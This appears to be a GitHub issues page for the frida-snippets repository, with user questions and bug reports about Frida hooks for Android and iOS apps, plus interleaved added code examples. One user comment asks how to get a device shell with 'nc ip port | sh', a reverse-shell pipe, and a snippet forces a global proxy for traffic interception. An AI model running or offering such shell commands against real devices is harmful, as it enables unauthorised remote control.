iddoeldor / frida-snippets
Hand-crafted Frida examples
The script uses "nm -C -D" to get the arguments of a module, and I tried that on libc.so and got:
00072720 T pthread_rwlockattr_getkind_np
000726d0 T pthread_rwlockattr_getpshared
00072690 T pthread_rwlockattr_init
00072740 T pthread_rwlockattr_setkind_np
000726f0 T pthread_rwlockattr_setpshared
00072800 T pthread_rwlock_destroy
00072770 T pthread_rwlock_init
00072820 T pthread_rwlock_rdlock
00072c10 T pthread_rwlock_timedrdlock
00073030 T pthread_rwlock_timedwrlock
00072c40 T pthread_rwlock_tryrdlock
00073060 T pthread_rwlock_trywrlock
There's no signature info... And I checked that the ELF format does not store signature info. So is there another way of getting the signature of a method with Frida?
Many thanks.
Hello there, I've been testing your scripts and I think I ran into a problem with trace_class.js.
Could you please confirm if the following is the expected output?:
... {"tracing":"java.net.Socket.setSoLinger","overloaded":1} {"tracing":"java.net.Socket.setSoTimeout","overloaded":1} {"tracing":"java.net.Socket.setTcpNoDelay","overloaded":1} {"tracing":"java.net.Socket.setTrafficClass","overloaded":1} {"tracing":"java.net.Socket.shutdownInput","overloaded":1} {"tracing":"java.net.Socket.shutdownOutput","overloaded":1} {"tracing":"java.net.Socket.toString","overloaded":1} {"tracing":"java.net.Socket.cacheLocalAddress","overloaded":1} {"tracing":"java.net.Socket.checkDestination","overloaded":1} {"tracing":"java.net.Socket.checkOpenAndCreate","overloaded":1} {"tracing":"java.net.Socket.setSocketImplFactory","overloaded":1} {"tracing":"java.net.Socket.startupSocket","overloaded":1} {"tracing":"java.net.Socket.tryAllAddresses","overloaded":1} {"tracing":"java.net.Socket.usingSocks","overloaded":1} ...
To me it looks like hook[targetMethod].overloads[i].implementation = function...
never gets called for some reason.
Android version: 5.0.1
Java.perform(function () {
  send("Starting hook proxy bypass");
  var ActivityThread = Java.use('android.app.ActivityThread');
  var ConnectivityManager = Java.use('android.net.ConnectivityManager');
  var ProxyInfo = Java.use('android.net.ProxyInfo');
  var proxyInfo = ProxyInfo.$new('10.1.11.42', 8080, ''); // change to null in order to disable the proxy.
  var context = ActivityThread.currentApplication().getApplicationContext();
  var connectivityManager = Java.cast(context.getSystemService('connectivity'), ConnectivityManager);
  connectivityManager.setGlobalProxy(proxyInfo);
});
TypeError: cannot read property 'getApplicationContext' of null
at [anon] (duk_hobject_props.c:2384)
at [anon] (/repl1.js:9)
at frida/node_modules/frida-java/lib/vm.js:43
at M (frida/node_modules/frida-java/index.js:347)
at frida/node_modules/frida-java/index.js:333
at input:1
Crashed when hooking a variadic function.
public final boolean gesture(long j, long j2, int[]... iArr)
I just took a course on Frida and I was wondering how I would use these scripts to get a shell on the device. I want to run the toybox command
nc ip port | sh
I know it is possible, I just needed guidance.
https://github.com/iddoeldor/frida-snippets#reveal-native-methods
The "method" field in the output is not right.
Maybe you should change it like below; somehow it works for me.
var structSize = pSize * 3; // = sizeof(JNINativeMethod)
var methodsPtr = ptr(args[2]);
var signature = methodsPtr.add(i * structSize + pSize).readPointer();
var fnPtr = methodsPtr.add(i * structSize + (pSize * 2)).readPointer(); // void* fnPtr
var jClass = jclassAddress2NameMap[args[0]].split('/');
var methodName = methodsPtr.add(i * structSize).readPointer().readCString(); // <------ here
console.log('\x1b[3' + '6;01' + 'm', JSON.stringify({
  module: DebugSymbol.fromAddress(fnPtr)['moduleName'], // https://www.frida.re/docs/javascript-api/#debugsymbol
  package: jClass.slice(0, -1).join('.'),
  class: jClass[jClass.length - 1],
  method: methodName, // methodsPtr.readPointer().readCString(), // char* name <------ here
  signature: signature.readCString(), // char* signature TODO Java bytecode signature parser { Z: 'boolean', B: 'byte', C: 'char', S: 'short', I: 'int', J: 'long', F: 'float', D: 'double', L: 'fully-qualified-class;', '[': 'array' } https://github.com/skylot/jadx/blob/master/jadx-core/src/main/java/jadx/core/dex/nodes/parser/SignatureParser.java
  address: fnPtr
}), '\x1b[39;49;00m');
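The `signature` string read from the JNINativeMethod table is a JNI method descriptor, e.g. `(ILjava/lang/String;[B)V`. The parser below is an added example written for this page, not code from frida-snippets: it fills in the "TODO Java bytecode signature parser" from the comment above, renders a descriptor as a Java-style prototype (the variadic `gesture(long, long, int[]...)` method from the earlier report would have the descriptor `(JJ[[I)Z` and comes out as `boolean gesture(long, long, int[][])`), and ends with a hypothetical `readNativeMethod()` helper that reads one table entry using the struct layout from the snippet above. That last helper runs only inside a Frida agent; the rest is plain ES5 and runs anywhere.

```javascript
// Added example: a parser for JNI method descriptors such as "(ILjava/lang/String;[B)V".
// Not part of frida-snippets; ES5 only so it also runs on Frida's Duktape runtime.

var PRIMITIVES = {
  Z: 'boolean', B: 'byte', C: 'char', S: 'short',
  I: 'int', J: 'long', F: 'float', D: 'double', V: 'void'
};

// Parse one type descriptor starting at `pos`.
// Returns { name: 'int[]', next: <index just after the descriptor> }.
function parseType(sig, pos) {
  var dims = 0;
  while (sig.charAt(pos) === '[') { dims++; pos++; }
  var c = sig.charAt(pos);
  var name;
  if (c === 'L') {
    // Object type: Lfully/qualified/Name;
    var end = sig.indexOf(';', pos);
    if (end === -1) throw new Error('unterminated class name in ' + sig);
    name = sig.slice(pos + 1, end).replace(/\//g, '.');
    pos = end + 1;
  } else if (PRIMITIVES.hasOwnProperty(c)) {
    name = PRIMITIVES[c];
    pos++;
  } else {
    throw new Error('bad type descriptor at offset ' + pos + ' in ' + sig);
  }
  for (var i = 0; i < dims; i++) name += '[]';
  return { name: name, next: pos };
}

// Parse a full method descriptor "(args)ret" into { args: [...], ret: '...' }.
function parseMethodSignature(sig) {
  if (sig.charAt(0) !== '(') throw new Error('method descriptor must start with "(": ' + sig);
  var args = [];
  var pos = 1;
  while (sig.charAt(pos) !== ')') {
    if (pos >= sig.length) throw new Error('missing ")" in ' + sig);
    var t = parseType(sig, pos);
    args.push(t.name);
    pos = t.next;
  }
  var ret = parseType(sig, pos + 1);
  if (ret.next !== sig.length) throw new Error('trailing characters in ' + sig);
  return { args: args, ret: ret.name };
}

// Render as a Java-like prototype, e.g. "boolean gesture(long, long, int[][])".
function formatNativeMethod(name, sig) {
  var parsed = parseMethodSignature(sig);
  return parsed.ret + ' ' + name + '(' + parsed.args.join(', ') + ')';
}

// Hypothetical helper, usable only inside a Frida agent (needs Process/NativePointer):
// reads entry `index` of a JNINativeMethod array laid out as { char* name; char* signature; void* fnPtr }.
function readNativeMethod(methodsPtr, index) {
  var pSize = Process.pointerSize;
  var entry = methodsPtr.add(index * pSize * 3);
  var name = entry.readPointer().readCString();
  var signature = entry.add(pSize).readPointer().readCString();
  return {
    name: name,
    prototype: formatNativeMethod(name, signature),
    fnPtr: entry.add(pSize * 2).readPointer()
  };
}
```

Inside the RegisterNatives hook from the snippet, `readNativeMethod(ptr(args[2]), i)` replaces the three manual pointer reads, and `prototype` is what you would print in place of the raw `signature` string.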
Hey Team,
I was wondering if you could update the documentation for the iOS screenshot example to include the relevant imports, in addition to providing a usage example.
Hi, I would be grateful if you could create a script (Android) for okhttp3 request/response logging.
Thanks.
Hi. I have one question. I have a C++ function, MyEngine::Core::GenerateUniqueKey(). This function is inside my MyEngine.framework (iOS).
How can I hook this function using Frida?
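Frida looks a native function up by its symbol name, and for a C++ method that is the Itanium-ABI mangled name rather than the source spelling. This also bears on the first question above: a C symbol in an ELF or Mach-O symbol table carries no signature, but a C++ mangled name does encode the parameter types (not the return type), which is what `nm -C` demangles. The example below is added here and is not code from frida-snippets: it mangles a simple nested name, so `MyEngine::Core::GenerateUniqueKey()` becomes `_ZN8MyEngine4Core17GenerateUniqueKeyEv`, and then, inside a Frida agent only, resolves that symbol in the `MyEngine` module (the module name is taken from the question) and attaches to it. It covers only non-template names with no arguments or a few builtin parameter types; anything else throws. Frida reports Darwin symbols without the extra leading underscore that the Mach-O symbol table adds, so the Itanium form is the one to look up.

```javascript
// Added example (not the frida-snippets code): mangle a simple C++ function name the way
// the Itanium C++ ABI does (what clang emits for iOS frameworks), then hook it with Frida.

var BUILTIN_CODES = {
  'void': 'v', 'bool': 'b', 'char': 'c', 'int': 'i', 'unsigned int': 'j',
  'long': 'l', 'unsigned long': 'm', 'float': 'f', 'double': 'd'
};

// Mangle "A::B::func(int, double)" into "_ZN1A1B4funcEid".
// Supported: nested, non-template names and builtin parameter types only.
function mangleCxxName(prototype) {
  var m = /^([A-Za-z_][\w:]*)\s*\(([^)]*)\)$/.exec(prototype.trim());
  if (m === null) throw new Error('unsupported prototype: ' + prototype);
  var parts = m[1].split('::');
  // Each name component is <length><identifier>; nested names are wrapped in N ... E.
  var encoded = parts.map(function (p) { return p.length + p; }).join('');
  var name = parts.length > 1 ? 'N' + encoded + 'E' : encoded;
  var params = m[2].trim() === '' ? [] : m[2].split(',').map(function (p) { return p.trim(); });
  // An empty parameter list is encoded as 'v'.
  var codes = params.length === 0 ? 'v' : params.map(function (p) {
    if (!BUILTIN_CODES.hasOwnProperty(p)) throw new Error('unsupported parameter type: ' + p);
    return BUILTIN_CODES[p];
  }).join('');
  return '_Z' + name + codes;
}

// Frida-only: resolve the mangled symbol, exported symbols first, then the module's symbol table.
function findCxxFunction(moduleName, prototype) {
  var mangled = mangleCxxName(prototype);
  var addr = Module.findExportByName(moduleName, mangled);
  if (addr !== null) return addr;
  var hits = Process.getModuleByName(moduleName).enumerateSymbols().filter(function (s) {
    return s.name === mangled;
  });
  return hits.length > 0 ? hits[0].address : null;
}

// The hook itself only makes sense inside a Frida agent, so it is skipped elsewhere.
if (typeof Interceptor !== 'undefined') {
  var target = findCxxFunction('MyEngine', 'MyEngine::Core::GenerateUniqueKey()');
  if (target === null) {
    console.log('symbol not found; the binary may be stripped or use a different spelling');
  } else {
    Interceptor.attach(target, {
      onEnter: function (args) {
        // For a non-static member function args[0] is `this` (the MyEngine::Core instance).
        console.log('GenerateUniqueKey called on ' + args[0]);
      },
      onLeave: function (retval) {
        console.log('GenerateUniqueKey returned ' + retval);
      }
    });
  }
}
```

If `findCxxFunction` returns null, the framework does not carry the symbol under that name; checking what `nm` prints for the binary tells you whether it is stripped or whether the method has parameters the small mangler above does not handle.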
The snippet for creating a Toast on Android doesn't seem to work:
[Android Emulator 5554::owasp.mstg.uncrackable1]-> Java.scheduleOnMainThread(function() {
  Java.use("android.widget.Toast")
    .makeText(
      Java.use("android.app.ActivityThread").currentApplication().getApplicationContext(),
      "Text to Toast here",
      0 // https://developer.android.com/reference/android/widget/Toast#LENGTH_LONG
    )
    .show();
});
Error: makeText(): argument types do not match any of:
.overload('android.content.Context', 'int', 'int')
.overload('android.content.Context', 'java.lang.CharSequence', 'int')
.overload('android.content.Context', 'android.os.Looper', 'java.lang.CharSequence', 'int')
at pe (frida/node_modules/frida-java-bridge/lib/class-factory.js:549)
at frida/node_modules/frida-java-bridge/lib/class-factory.js:951
at [anon] (input:7)
at frida/node_modules/frida-java-bridge/index.js:288
[Android Emulator 5554::owasp.mstg.uncrackable1]-> Frida.version
"12.8.20"
https://github.com/frida/frida-java/issues/78: this issue, do you know how to solve it?
Code:
function observeClass(name) {
  var k = ObjC.classes[name];
  k.$ownMethods.forEach(function(m) {
    var impl = k[m].implementation;
    console.log('Observing ' + name + ' ' + m);
    Interceptor.attach(impl, {
      onEnter: function(a) {
        this.log = [];
        // a[0] is self, a[1] is the selector (a C string); the method arguments start at a[2]
        this.log.push('(' + a[0] + ',' + Memory.readUtf8String(a[1]) + ') ' + name + ' ' + m);
        if (m.indexOf(':') !== -1) {
          var params = m.split(':');
          params[0] = params[0].split(' ')[1];
          for (var i = 0; i < params.length - 1; i++) {
            try {
              this.log.push(params[i] + ': ' + new ObjC.Object(a[2 + i]).toString());
            } catch (e) {
              this.log.push(params[i] + ': ' + a[2 + i].toString());
            }
          }
        }
        this.log.push(
          Thread.backtrace(this.context, Backtracer.ACCURATE)
            .map(DebugSymbol.fromAddress)
            .join('\n')
        );
      },
      onLeave: function(r) {
        try {
          this.log.push('RET: ' + new ObjC.Object(r).toString());
        } catch (e) {
          this.log.push('RET: ' + r.toString());
        }
        console.log(this.log.join('\n') + '\n');
      }
    });
  });
}
// The call must be wrapped in a function: setImmediate(observeClass('EKEventStore'))
// would run observeClass immediately and hand setImmediate its undefined return value.
setImmediate(function() { observeClass('EKEventStore'); });
Error Message:
object_getClass + 4 libobjc.A.dylib
object_getClass:libobjc.A.dylib`object_setClass:
0x1b7c1be8 <+0>: push {r4, r5, r7, lr}
Socket activity example:
Process
  .getModuleByName({ linux: 'libc.so', darwin: 'libSystem.B.dylib', windows: 'ws2_32.dll' }[Process.platform])
  .enumerateExports().filter(ex => ex.type === 'function' && ['connect', 'recv', 'send', 'read', 'write'].some(prefix => ex.name.indexOf(prefix) === 0))
  .forEach(ex => {
    Interceptor.attach(ex.address, {
      onEnter: function (args) {
        var fd = args[0].toInt32();
        if (Socket.type(fd) !== 'tcp')
          return;
        var address = Socket.peerAddress(fd);
        if (address === null)
          return;
        console.log(fd, ex.name, address.ip + ':' + address.port);
      }
    })
  })
Got an error:
Error TS2339: Property 'ip' does not exist on type 'SocketEndpointAddress'. Property 'ip' does not exist on type 'UnixEndpointAddress'.
Same for the port property.
If I use JSON.stringify(address) I get:
{"ip": "0.0.0.0", "port": 0}
for every connection.
Frida 12.8.14
In Objective-C, there is the following code:
{
  responseBody = {
    result = (
      {
        contentId = 1272801112155672577;
        title = "\U6d3b\U52a81";
        titleName = "\U6d3b\U52a81";
        validTime = "2020-06-16T08:00:07.000+0000";
      },
      {
        contentId = 1273531592463273984;
        title = "uat\U6d3b\U52a8\U6d4b\U8bd52";
        titleName = "uat\U6d3b\U52a8\U6d4b\U8bd52uat\U6d3b\U52a8\U6d4b\U8bd52";
        validTime = "2020-06-18T08:22:47.000+0000";
      }
    );
  };
  responseCode = GL000000;
  responseDate = 20200710;
  responseJnlNo = 1281589810019606528;
  responseMsg = "";
  responseTime = "20200710 22:03:16";
}
How can I convert this complex dictionary into JSON, and at the same time how can I convert JSON back into such a complex dictionary?
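The Objective-C API for this is `NSJSONSerialization`, which Frida can call through `ObjC.classes`. The two conversion helpers below are an added example written for this page, not code from frida-snippets, and run only inside a Frida agent; `dict` in the usage comment is a hypothetical `ObjC.Object` holding the dictionary above. The third helper runs anywhere: the `\U6d3b\U52a8` sequences in the dump are how `description` prints non-ASCII characters, and it decodes them back into text, so `"\U6d3b\U52a81"` becomes `"活动1"`.

```javascript
// Added example (not the frida-snippets code): NSDictionary <-> JSON through NSJSONSerialization,
// plus a decoder for the \Uxxxx escapes that NSDictionary's description output uses.

var NSUTF8StringEncoding = 4;      // NSStringEncoding value for UTF-8
var NSJSONWritingPrettyPrinted = 1; // NSJSONWritingOptions bit for indented output

// Frida-only (needs ObjC.classes): serialize an NSDictionary/NSArray to a JSON string.
function nsObjectToJson(nsObject) {
  var NSJSONSerialization = ObjC.classes.NSJSONSerialization;
  if (!NSJSONSerialization.isValidJSONObject_(nsObject)) {
    // NSDate/NSData values or non-string keys cannot be encoded; convert those first.
    throw new Error('object contains values NSJSONSerialization cannot encode');
  }
  var data = NSJSONSerialization.dataWithJSONObject_options_error_(nsObject, NSJSONWritingPrettyPrinted, NULL);
  return ObjC.classes.NSString.alloc().initWithData_encoding_(data, NSUTF8StringEncoding).toString();
}

// Frida-only: parse a JSON string back into an NSDictionary/NSArray (returned as an ObjC.Object).
function jsonToNsObject(jsonText) {
  var data = ObjC.classes.NSString.stringWithString_(jsonText).dataUsingEncoding_(NSUTF8StringEncoding);
  var obj = ObjC.classes.NSJSONSerialization.JSONObjectWithData_options_error_(data, 0, NULL);
  if (obj === null) throw new Error('invalid JSON: ' + jsonText);
  return obj;
}

// Runs anywhere: -[NSObject description] prints non-ASCII characters as \Uxxxx;
// turn them back into text so a dump like the one above becomes readable.
function decodeDescriptionEscapes(text) {
  return text.replace(/\\U([0-9A-Fa-f]{4})/g, function (match, hex) {
    return String.fromCharCode(parseInt(hex, 16));
  });
}

// Frida-only usage, with `dict` a hypothetical ObjC.Object for the dictionary above
// (for example new ObjC.Object(args[2]) inside an Interceptor hook):
//   var json = nsObjectToJson(dict);
//   var back = jsonToNsObject(json);
//   console.log(decodeDescriptionEscapes(back.toString()));
```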
Copy the Socket activity example to script.js:
Process
  .getModuleByName({ linux: 'libc.so', darwin: 'libSystem.B.dylib', windows: 'ws2_32.dll' }[Process.platform])
  .enumerateExports().filter(ex => ex.type === 'function' && ['connect', 'recv', 'send', 'read', 'write'].some(prefix => ex.name.indexOf(prefix) === 0))
  .forEach(ex => {
    Interceptor.attach(ex.address, {
      onEnter: function (args) {
        var fd = args[0].toInt32();
        if (Socket.type(fd) !== 'tcp')
          return;
        var address = Socket.peerAddress(fd);
        if (address === null)
          return;
        console.log(fd, ex.name, address.ip + ':' + address.port);
      }
    })
  })
Execute:
frida -U com.xxxx.xxxx -l script.js --no-pause
     ____
    / _  |   Frida 12.11.17 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://www.frida.re/docs/home/
Failed to load script: script(line 3): SyntaxError: parse error
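Both socket-activity reports above run into the same two things. First, `Socket.peerAddress()` returns an object whose shape depends on the socket family: `{ip, port}` for TCP/UDP sockets and `{path}` for Unix-domain sockets, which is what the TypeScript error is pointing at. Second, the snippet uses ES6 arrow functions, which the Duktape runtime that Frida 12.x uses by default does not parse; that is a likely cause of the SyntaxError on line 3 (the V8 runtime, selected with `--runtime=v8`, accepts them). The version below is an added example, not the repository's snippet, written in ES5 so it loads on either runtime. It goes a little beyond the original by keeping IPv6 (`tcp6`) and Unix stream sockets, which the `!== 'tcp'` check drops, and by treating the unspecified `0.0.0.0:0` address the second report sees as "no peer" rather than logging it. The `describeEndpoint()` and `formatSocketEvent()` helpers run anywhere; the hook itself runs only inside a Frida agent.

```javascript
// Added example (not the frida-snippets code): ES5-only socket activity hook with a
// family-aware formatter for the object returned by Socket.peerAddress().
// Socket.peerAddress() yields {ip, port} for TCP/UDP sockets, {path} for Unix-domain
// sockets, or null when the peer is unknown.

var SOCKET_FUNCS = ['connect', 'recv', 'send', 'read', 'write'];

// Turn a Frida SocketEndpointAddress into a printable string.
// Returns null for addresses not worth logging: unknown peer, or the wildcard 0.0.0.0:0 / [::]:0.
function describeEndpoint(address) {
  if (address === null || address === undefined) return null;
  if (typeof address.path === 'string') {            // UnixEndpointAddress
    return 'unix:' + (address.path === '' ? '<anonymous>' : address.path);
  }
  if (typeof address.ip === 'string') {              // TcpEndpointAddress / UdpEndpointAddress
    var unspecified = address.ip === '0.0.0.0' || address.ip === '::';
    if (unspecified && address.port === 0) return null;
    var host = address.ip.indexOf(':') !== -1 ? '[' + address.ip + ']' : address.ip;
    return host + ':' + address.port;
  }
  return null;
}

// Socket.type() returns 'tcp', 'udp', 'tcp6', 'udp6', 'unix:stream', 'unix:dgram' or null.
// The original snippet only kept 'tcp', which silently drops IPv6 sockets.
function isStreamSocket(socketType) {
  return socketType === 'tcp' || socketType === 'tcp6' || socketType === 'unix:stream';
}

// Build the log line for one intercepted call, or null if it should be skipped.
function formatSocketEvent(fd, funcName, socketType, address) {
  if (!isStreamSocket(socketType)) return null;
  var peer = describeEndpoint(address);
  if (peer === null) return null;
  return fd + ' ' + funcName + ' ' + socketType + ' ' + peer;
}

function startsWithSocketFunc(name) {
  for (var i = 0; i < SOCKET_FUNCS.length; i++) {
    if (name.indexOf(SOCKET_FUNCS[i]) === 0) return true;
  }
  return false;
}

// The hook itself: only meaningful inside a Frida agent, so it is skipped elsewhere.
if (typeof Interceptor !== 'undefined' && typeof Process !== 'undefined') {
  var libName = { linux: 'libc.so', darwin: 'libSystem.B.dylib', windows: 'ws2_32.dll' }[Process.platform];
  Process.getModuleByName(libName).enumerateExports().forEach(function (ex) {
    if (ex.type !== 'function' || !startsWithSocketFunc(ex.name)) return;
    Interceptor.attach(ex.address, {
      onEnter: function (args) {
        var fd = args[0].toInt32();
        var line = formatSocketEvent(fd, ex.name, Socket.type(fd), Socket.peerAddress(fd));
        if (line !== null) console.log(line);
      }
    });
  });
}
```

Note that `read`/`write` are also called on ordinary file descriptors; `Socket.type()` returns null for those, so `isStreamSocket()` filters them out before any address lookup happens.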
I am using the observeClass method from Frida and am successfully able to hook into the function. However, the logging is a bit cryptic.
For this example, assume the class is MainClass and the method in it that I'm observing is ChildMethod.
My end goal is to call ChildMethod manually, but to do that I need to replicate and pass in the arguments through Frida, which I am trying to get by observing them in the following. I'm used to variables and passing them into functions, whereas this code is slightly cryptic. How do I achieve this end goal, and which of these are the actual args in the function?
0x105082d74 winnerscircle20!0x3ded74 (0x1003ded74)
0x105082ee8 winnerscircle20!0x3deee8 (0x1003deee8)
0x1051f5638 winnerscircle20!0x551638 (0x100551638)
0x1057c62a0 FBLPromises!0x62a0 (0x62a0)
0x183a0d298 libdispatch.dylib!_dispatch_call_block_and_release
0x183a0e280 libdispatch.dylib!_dispatch_client_callout
0x1839bd0ac libdispatch.dylib!_dispatch_main_queue_callback_4CF$VARIANT$mp
0x183d555e0 CoreFoundation!__CFRUNLOOP_IS_SERVICING_THE_MAIN_DISPATCH_QUEUE__
0x183d4fa88 CoreFoundation!__CFRunLoopRun
0x183d4eba0 CoreFoundation!CFRunLoopRunSpecific
0x19aab7598 GraphicsServices!GSEventRunModal
0x1866402f4 UIKitCore!-[UIApplication _run]
0x186645874 UIKitCore!UIApplicationMain
0x104ca80ec winnerscircle20!0x40ec (0x1000040ec)
0x183a2d568 libdyld.dylib!start